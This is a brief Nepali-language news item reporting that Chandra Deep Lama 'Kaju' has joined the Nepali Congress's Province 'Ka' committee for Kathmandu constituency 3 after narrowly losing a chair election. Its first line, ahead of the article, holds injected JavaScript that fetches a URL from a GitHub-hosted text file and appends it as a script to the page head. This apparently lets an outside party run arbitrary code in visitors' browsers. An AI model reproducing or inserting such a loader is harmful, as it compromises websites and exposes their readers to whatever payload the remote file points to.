;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
समाजसेवी तथा व्यबसायी चन्द्र दीप लामा ‘काजु’ नेपालि काँग्रेस काठमाडौँ जिल्ल्ला क्षेत्र नं ३ प्रदेस ‘क’ को पदेन सदस्य भएका छन् | काजु लामो समय देखि सामाजिक क्षेत्रमा सक्रिय रुपमा लागि पर्दै आएका छन् |
काँग्रेसको १४ औं महाधिबेशनमा उनले काठमाडौँ क्षेत्र नं ३ प्रदेश ‘क’ सभापतिमा आफ्नो उम्मेदवार दिएका थिए उनको प्रतिस्पर्धी श्रीराम चालिसे संग झिनो मतले पराजित भएका थिए |
उनलाई अहिलेका सभापति श्री राम चलिसेले उच्च सम्मान गर्दै प्रदेश ‘क’ को सदस्यमा स्वागत गरेका हुन् |
फेसबुक प्रतिक्रियाहरु